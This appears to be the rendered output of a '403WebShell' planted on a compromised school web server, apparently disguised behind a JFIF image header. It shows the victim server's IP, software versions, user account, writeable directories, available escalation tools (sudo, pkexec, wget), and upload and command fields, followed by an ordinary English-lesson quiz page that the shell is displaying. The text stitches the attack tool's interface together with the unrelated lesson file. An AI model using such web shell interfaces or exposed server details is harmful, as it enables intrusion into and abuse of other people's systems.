????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.139.237.30
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelH/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelH/Category1/LevelHCat1Lesson40b.html
<!doctype html>
<html>
    <head>
        <title>Questions &&nbsp;answers and fill in the blanks</title>
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        <script>
            
            function page_preLoad()
            {
                shared_setDeviceTypeLevelCategoryLastLesson(Level.H, Category.No1);
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.H, Category.No1, '40b'), true, true);
                shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_tds = ['id_options1', 'id_td_humans', 'id_td_12Percent', 'id_td_poison', 'id_td_trees', 'id_td_effects'];
                var ids_spans = ['id_span_humans', 'id_span_12Percent', 'id_span_poison', 'id_span_trees', 'id_span_effects'];
                var ids_boxes_without_drag_here = ['id_dropbox_humans', 'id_dropbox_effects', 'id_dropbox_trees', 'id_dropbox_12Percent', 'id_dropbox_poison'];
                
                
                var ids_texts = new Array();
                
                for (var textId = 1; textId <= 11; textId++)
                {
                    ids_texts.push('id_td_text' + textId);
                }
                
                var ids_textBoxes = new Array();
                
                for (var textBoxId = 1; textBoxId <= 3; textBoxId++)
                {
                    var idTextBox = 'id_textBox' + textBoxId;
                    var eTextBox = document.getElementById(idTextBox);
                    eTextBox.value = '';
                    
                    if (shared_currentDeviceType == shared_DeviceTypeAndroid)
                    {
                        eTextBox.style.border = 'solid 2px black';
                    }
                    
                    ids_textBoxes.push(idTextBox);
                }
                
                var ids_All = ids_headings.concat(ids_texts, ids_textBoxes, ids_tds, ids_boxes_without_drag_here);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes_without_drag_here);
                shared_init_dropping_spans(ids_spans);
                
                var id_tables_array = ['id_table1', 'id_table2'];
                shared_border_collapse_for_tables_except_android(id_tables_array);
            }
        
            function page_onLoad()
            {
                
            }
            
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelH');
            }
            
            function btnPrevious_click()
            {
                window.location = 'LevelHCat1Lesson40a.html';
            }
            
            function btnNext_click()
            {
                window.location = 'LevelHCat1Lesson41.html';
            }
        
            function DragDrop(id_dropBox, id_imgElement, ids_array)
            {
                if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    if (id_imgElement == '')
                    {
                        shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                    }
                    else
                    {
                        shared_dragDropImageAndIsMovedTrue(shared_currentDropingId, id_dropBox, id_imgElement);
                    }
                    
                    shared_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    shared_resetCurrentDroppingPosition(id_dropBox);
                }
            }
            
            function isAllInfosMovedShowClapsAnimation()
            {
                var ids_boxes = ['id_dropbox_humans', 'id_dropbox_effects', 'id_dropbox_trees', 'id_dropbox_12Percent', 'id_dropbox_poison'];
                
                shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
            }
        
            function btnValidate_click()
            {
                var ids_boxes = ['id_dropbox_humans', 'id_dropbox_effects', 'id_dropbox_trees', 'id_dropbox_12Percent', 'id_dropbox_poison'];
                var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes);
                
                var eTextBox1 = document.getElementById('id_textBox1');
                var eTextBox2 = document.getElementById('id_textBox2');
                var eTextBox3 = document.getElementById('id_textBox3');
                
                if ((eTextBox1.value !== '') &&
                    (eTextBox2.value !== '') &&
                    (eTextBox3.value !== '') &&
                    isAllBoxesFilled)
                {
                    shared_show_claps_animation('shared_id_div_claps_image');
                }
            }
        </script>
    </head>
    <body onload="page_onLoad()">
        
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
                                    <tr height="70%">
                                        <td style="padding-bottom:0px">
                                            <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                                <tr height="5%">
                                                    <td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent"><u>Answer the following</u>:
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="33%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="30%">
                                                                            <td id="id_td_text1" class="shared_style_black_24px_bold_padding_left_2_percent">1. What causes disaster like tornado?</td>
                                                                        </tr>
                                                                        <tr height="*">
                                                                            <td id="id_td_text2" align="center">
                                                                                <textarea id="id_textBox1" class="shared_style_blue_24px_bold" style="width:88%; text-align:left; resize:none" rows="5">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="33%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="30%">
                                                                            <td id="id_td_text3" class="shared_style_black_24px_bold_padding_left_2_percent">2. What causes acid rain?</td>
                                                                        </tr>
                                                                        <tr height="*">
                                                                            <td id="id_td_text4" align="center">
                                                                                <textarea id="id_textBox2" class="shared_style_blue_24px_bold" style="width:88%; text-align:left; resize:none" rows="5">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="30%">
                                                                            <td id="id_td_text5" class="shared_style_black_24px_bold_padding_left_2_percent">3. Mention one of the factors for floods?</td>
                                                                        </tr>
                                                                        <tr height="*">
                                                                            <td id="id_td_text6" align="center">
                                                                                <textarea id="id_textBox3" class="shared_style_blue_24px_bold" style="width:88%; text-align:left; resize:none" rows="5">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td>
                                            <table id="id_table2" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                                <tr height="10%">
                                                    <td id="id_td_heading2" class="shared_style_blue_24px_bold_padding_left_2_percent"><u>Fill in the blanks</u>:</td>
                                                </tr>
                                                <tr height="15%">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr>
                                                                <td id="id_options1" class="shared_style_blue_24px_bold_padding_left_2_percent" width="20%">Options:</td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="50%">
                                                                            <td id="id_td_12Percent" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_12Percent">12 percent</span>
                                                                            </td>
                                                                            <td id="id_td_poison" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_poison">poison</span>
                                                                            </td>
                                                                            <td id="id_td_humans" class="shared_style_red_24px_bold" width="*" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_humans">Humans</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="50%">
                                                                            <td id="id_td_effects" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_effects">effects</span>
                                                                            </td>
                                                                            <td id="id_td_trees" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_trees">trees</span>
                                                                            </td>
                                                                            <td width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td style="padding-left:2%">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr id="id_tr_dropbox_humans"
                                                                ondragover="shared_highlight('id_dropbox_humans'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_humans')"
                                                                ondrop="DragDrop('id_dropbox_humans', '', ['id_span_humans'])">
                                                                <td id="id_td_text7" class="shared_style_black_24px_bold">
                                                                    <span>1. &nbsp;</span>
                                                                    <span id="id_dropbox_humans" class="shared_style_red_24px_bold">________</span>
                                                                    <span>&nbsp;are causing threat to planet earth.</span>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_effects"
                                                                ondragover="shared_highlight('id_dropbox_effects'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_effects')"
                                                                ondrop="DragDrop('id_dropbox_effects', '', ['id_span_effects'])">
                                                                <td id="id_td_text8" class="shared_style_black_24px_bold">
                                                                    <span>2. Nobody can escape the&nbsp;</span>
                                                                    <span id="id_dropbox_effects" class="shared_style_red_24px_bold">_______</span>
                                                                    <span>&nbsp;of pollution.</span>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_trees"
                                                                ondragover="shared_highlight('id_dropbox_trees'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_trees')"
                                                                ondrop="DragDrop('id_dropbox_trees', '', ['id_span_trees'])">
                                                                <td id="id_td_text9" class="shared_style_black_24px_bold">
                                                                    <span>3. Save the&nbsp;</span>
                                                                    <span id="id_dropbox_trees" class="shared_style_red_24px_bold">_____</span>
                                                                    <span>&nbsp;to save ourselves.</span>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_12Percent"
                                                                ondragover="shared_highlight('id_dropbox_12Percent'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_12Percent')"
                                                                ondrop="DragDrop('id_dropbox_12Percent', '', ['id_span_12Percent'])">
                                                                <td id="id_td_text10" class="shared_style_black_24px_bold">
                                                                    <span>4.&nbsp;</span>
                                                                    <span id="id_dropbox_12Percent" class="shared_style_red_24px_bold">__________</span>
                                                                    <span>&nbsp;of the world population lives on mountains.</span>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_poison"
                                                                ondragover="shared_highlight('id_dropbox_poison'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_poison')"
                                                                ondrop="DragDrop('id_dropbox_poison', '', ['id_span_poison'])">
                                                                <td id="id_td_text11" class="shared_style_black_24px_bold">
                                                                    <span>5. Polluted fish causes food&nbsp;</span>
                                                                    <span id="id_dropbox_poison" class="shared_style_red_24px_bold">_______</span>
                                                                    <span>&nbsp;.</span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_humans', {handle : 'id_td_humans', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_effects', {handle : 'id_td_effects', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_12Percent', {handle : 'id_td_12Percent', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_poison', {handle : 'id_td_poison', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_trees', {handle : 'id_td_trees', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_tr_dropbox_humans', {onOver : function(){shared_highlight('id_dropbox_humans')}, onOut : function(){shared_un_highlight('id_dropbox_humans')}, onDrop : function(){DragDrop('id_dropbox_humans', '', ['id_span_humans'])}});
            
            webkit_drop.add('id_tr_dropbox_effects', {onOver : function(){shared_highlight('id_dropbox_effects')}, onOut : function(){shared_un_highlight('id_dropbox_effects')}, onDrop : function(){DragDrop('id_dropbox_effects', '', ['id_span_effects'])}});
            
            webkit_drop.add('id_tr_dropbox_trees', {onOver : function(){shared_highlight('id_dropbox_trees')}, onOut : function(){shared_un_highlight('id_dropbox_trees')}, onDrop : function(){DragDrop('id_dropbox_trees', '', ['id_span_trees'])}});
            
            webkit_drop.add('id_tr_dropbox_12Percent', {onOver : function(){shared_highlight('id_dropbox_12Percent')}, onOut : function(){shared_un_highlight('id_dropbox_12Percent')}, onDrop : function(){DragDrop('id_dropbox_12Percent', '', ['id_span_12Percent'])}});
            
            webkit_drop.add('id_tr_dropbox_poison', {onOver : function(){shared_highlight('id_dropbox_poison')}, onOut : function(){shared_un_highlight('id_dropbox_poison')}, onDrop : function(){DragDrop('id_dropbox_poison', '', ['id_span_poison'])}});
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit